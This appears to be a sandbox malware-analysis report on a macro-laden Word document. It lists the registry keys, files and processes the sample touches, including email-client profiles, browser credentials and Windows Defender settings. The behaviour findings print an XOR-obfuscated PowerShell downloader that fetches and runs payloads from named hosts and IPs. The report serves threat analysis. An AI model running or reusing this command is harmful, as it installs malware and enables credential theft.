Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\29091b5932ee0f48aec4673270b08577
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\349c13b2d278c3458833b7862c0157f4
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\882b4247eb9feb478bcaf90664ec624c
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dfc6f427732b824da2ca53fc3cafb157
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Office\15.0\Outlook\Profiles
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Office\16.0\Outlook\Profiles
HKEY_CURRENT_USER
WinRegistryKey
Software\IncrediMail\Identities
HKEY_CURRENT_USER
WinRegistryKey
Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Group Mail
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\MSNMessenger
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\MessengerService
HKEY_CURRENT_USER
WinRegistryKey
Software\Yahoo\Pager
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\IdentityCRL
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows Live Mail
HKEY_CURRENT_USER
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
Mutex
WinRegistryKey
Software\Microsoft\Visual Basic\6.0
HKEY_CURRENT_USER
AllowUnsafeObjectPassing
WinRegistryKey
SOFTWARE\Microsoft\VBA\Monitors
HKEY_LOCAL_MACHINE
File
users\kft6utqw\appdata\local\temp\d3d3.tmp
users\kft6utqw\appdata\local\temp\d3d3.tmp
c:\
c:\users\kft6utqw\appdata\local\temp\d3d3.tmp
tmp
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
WinRegistryKey
Software\Clients\Mail\Microsoft Outlook
HKEY_LOCAL_MACHINE
DLLPathEx
File
users\kft6utqw\appdata\local\microsoft\windows\history\history.ie5\index.dat
users\kft6utqw\appdata\local\microsoft\windows\history\history.ie5\index.dat
c:\
c:\users\kft6utqw\appdata\local\microsoft\windows\history\history.ie5\index.dat
dat
File
users\kft6utqw\appdata\local\microsoft\windows\history\history.ie5\mshist012018062620180627\index.dat
users\kft6utqw\appdata\local\microsoft\windows\history\history.ie5\mshist012018062620180627\index.dat
c:\
c:\users\kft6utqw\appdata\local\microsoft\windows\history\history.ie5\mshist012018062620180627\index.dat
dat
File
users\kft6utqw\appdata\local\microsoft\windows\history\low\history.ie5\index.dat
users\kft6utqw\appdata\local\microsoft\windows\history\low\history.ie5\index.dat
c:\
c:\users\kft6utqw\appdata\local\microsoft\windows\history\low\history.ie5\index.dat
dat
File
users\kft6utqw\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017071220170713\index.dat
users\kft6utqw\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017071220170713\index.dat
c:\
c:\users\kft6utqw\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017071220170713\index.dat
dat
File
users\kft6utqw\appdata\roaming\mozilla\firefox\profiles\p7ap74gw.default\places.sqlite
users\kft6utqw\appdata\roaming\mozilla\firefox\profiles\p7ap74gw.default\places.sqlite
c:\
c:\users\kft6utqw\appdata\roaming\mozilla\firefox\profiles\p7ap74gw.default\places.sqlite
sqlite
WinRegistryKey
Mozilla Firefox 25.0\bin
INVALID
PathToExe
WinRegistryKey
Mozilla Firefox 25.0\bin
INVALID
PathToExe
WinRegistryKey
Mozilla Firefox 25.0\bin
INVALID
PathToExe
WinRegistryKey
Mozilla Firefox\bin
INVALID
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
WinRegistryKey
Software\Clients\Mail\Microsoft Outlook
HKEY_LOCAL_MACHINE
DLLPathEx
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe
users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe
c:\
c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe
exe
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Copied_To
File
programdata\oyvgkgw.exe
programdata\oyvgkgw.exe
c:\
c:\programdata\oyvgkgw.exe
exe
Copied_From
File
programdata\faq
programdata\faq
c:\
c:\programdata\faq
File
users\kft6utqw\appdata\roaming\tarutils
users\kft6utqw\appdata\roaming\tarutils
c:\
c:\users\kft6utqw\appdata\roaming\tarutils
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows Defender
HKEY_LOCAL_MACHINE
DisableAntiSpyware
WinRegistryKey
SOFTWARE\Microsoft\Windows Defender Security Center\Notifications
HKEY_LOCAL_MACHINE
DisableNotifications
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_CURRENT_USER
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
Software\Policies\Microsoft\Windows\System
HKEY_CURRENT_USER
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
File
conout$
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
File
STD_OUTPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
Analyzed Sample #64186
Malware Artifacts
64186
Sample-ID: #64186
Job-ID: #180623
This sample was analyzed by VMRay Analyzer 2.3.0 on a Windows 7 system
100
VTI Score based on VTI Database Version 2.7
Metadata of Sample File #64186
Submission-ID: #66018
C:\Users\kFT6uTQW\Desktop\022543.doc
doc
MD5
5a51e63d898736046b20e5b7bbab88ae
SHA1
6872e4301bba24de600600cbbb2434b244537134
SHA256
3985bc09caa13dadf70187a20d271303c272a41404beb497ac6116a5722a05d1
Opened_By
Metadata of Analysis for Job-ID #180623
Timeout
False
x86 64-bit
6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)
win7_64_sp1-mso2007
True
311.275
Windows 7
This is a property collection for additional information of VMRay analysis
VMRay Analyzer
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'') ".
Creates process
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "Global\.net clr networking".
Creates system object
Network
VTI rule match with VTI rule score 3/5
vmray_request_dns_by_name
Resolves host name "comprealm.net".
Performs DNS request
Network
VTI rule match with VTI rule score 3/5
vmray_request_dns_by_name
Resolves host name "www.icb.cl".
Performs DNS request
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe".
Creates process
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "PEMA08".
Creates system object
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "PEMB40".
Creates system object
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "Global\I78B0A7D7".
Creates system object
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "Global\M78B0A7D7".
Creates system object
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe".
Creates process
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "PEMB50".
Creates system object
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "PEMB64".
Creates system object
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\ProgramData\oyvGkGw.exe".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process ""C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp"".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process ""C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process ""C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp"".
Creates process
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "Global\Nx357ECDE7".
Creates system object
Browser
VTI rule match with VTI rule score 3/5
vmray_read_browser_history
Reads the browsing history for "Microsoft Internet Explorer".
Reads data related to browsing history
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates nameless mutex.
Creates system object
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process ""C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Windows\system32\cmd.exe".
Creates process
Information Stealing
VTI rule match with VTI rule score 4/5
vmray_readout_browser_credentials
Possibly trying to readout browser credentials.
Reads browser data
File System
VTI rule match with VTI rule score 2/5
vmray_handle_with_suspicious_files
File "c:\users\kft6utqw\appdata\local\temp\280.exe" is a known suspicious file.
Associated with suspicious files
Injection
VTI rule match with VTI rule score 5/5
vmray_modify_memory
"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" modifies memory of "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe"
Writes into the memory of a process running from a created or modified executable
Injection
VTI rule match with VTI rule score 5/5
vmray_modify_memory
"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" modifies memory of "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe"
Writes into the memory of a process running from a created or modified executable
Injection
VTI rule match with VTI rule score 5/5
vmray_modify_memory
"c:\programdata\oyvgkgw.exe" modifies memory of "c:\programdata\oyvgkgw.exe"
Writes into the memory of a process running from a created or modified executable
Injection
VTI rule match with VTI rule score 5/5
vmray_modify_control_flow_non_system
"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" alters context of "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe"
Modifies control flow of a process running from a created or modified executable
Injection
VTI rule match with VTI rule score 5/5
vmray_modify_control_flow_non_system
"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" alters context of "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe"
Modifies control flow of a process running from a created or modified executable
Injection
VTI rule match with VTI rule score 5/5
vmray_modify_control_flow_non_system
"c:\programdata\oyvgkgw.exe" alters context of "c:\programdata\oyvgkgw.exe"
Modifies control flow of a process running from a created or modified executable
Network
VTI rule match with VTI rule score 2/5
vmray_reputation_url_malicious
URL "197.245.46.11" is known as malicious URL.
Associated with known malicious/suspicious URLs
Network
VTI rule match with VTI rule score 2/5
vmray_reputation_url_malicious
URL "216.46.44.93" is known as malicious URL.
Associated with known malicious/suspicious URLs
Network
VTI rule match with VTI rule score 4/5
vmray_download_data_http_request
URL "www.icb.cl/ZxavoDe/".
Downloads data
Network
VTI rule match with VTI rule score 4/5
vmray_download_data_http_request
URL "197.245.46.11".
Downloads data
Network
VTI rule match with VTI rule score 4/5
vmray_download_data_http_request
URL "216.46.44.93".
Downloads data
Network
VTI rule match with VTI rule score 4/5
vmray_download_data_http_request
URL "94.70.244.227".
Downloads data
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "www.icb.cl/ZxavoDe/".
Connects to HTTP server
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "197.245.46.11".
Connects to HTTP server
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "216.46.44.93".
Connects to HTTP server
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "http://94.70.244.227:80/whoami.php".
Connects to HTTP server
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "94.70.244.227".
Connects to HTTP server
PE
VTI rule match with VTI rule score 2/5
vmray_drop_pe_file
Drops file "c:\users\kft6utqw\appdata\local\temp\280.exe".
Drops PE file
PE
VTI rule match with VTI rule score 2/5
vmray_drop_pe_file
Drops file "c:\programdata\oyvgkgw.exe".
Drops PE file
PE
VTI rule match with VTI rule score 2/5
vmray_drop_pe_file
Drops file "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe".
Drops PE file
PE
VTI rule match with VTI rule score 3/5
vmray_execute_dropped_pe_file
Executes dropped file "c:\users\kft6utqw\appdata\local\temp\280.exe".
Executes dropped PE file
PE
VTI rule match with VTI rule score 3/5
vmray_execute_dropped_pe_file
Executes dropped file "c:\programdata\oyvgkgw.exe".
Executes dropped PE file
PE
VTI rule match with VTI rule score 3/5
vmray_execute_dropped_pe_file
Executes dropped file "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe".
Executes dropped PE file
VBA Macro
VTI rule match with VTI rule score 1/5
vmray_execute_macro_on_ws_event
Executes macro on "Activate Workbook" event.
Executes macro on specific worksheet event
VBA Macro
VTI rule match with VTI rule score 2/5
vmray_execute_application
DmvtdQv = DtEFQrZRRpI + HYmQfXj + Shell(WzPZHVRYA + whKqOB + haTFtqcwzK, (20827 / 20827) - 1)
Executes application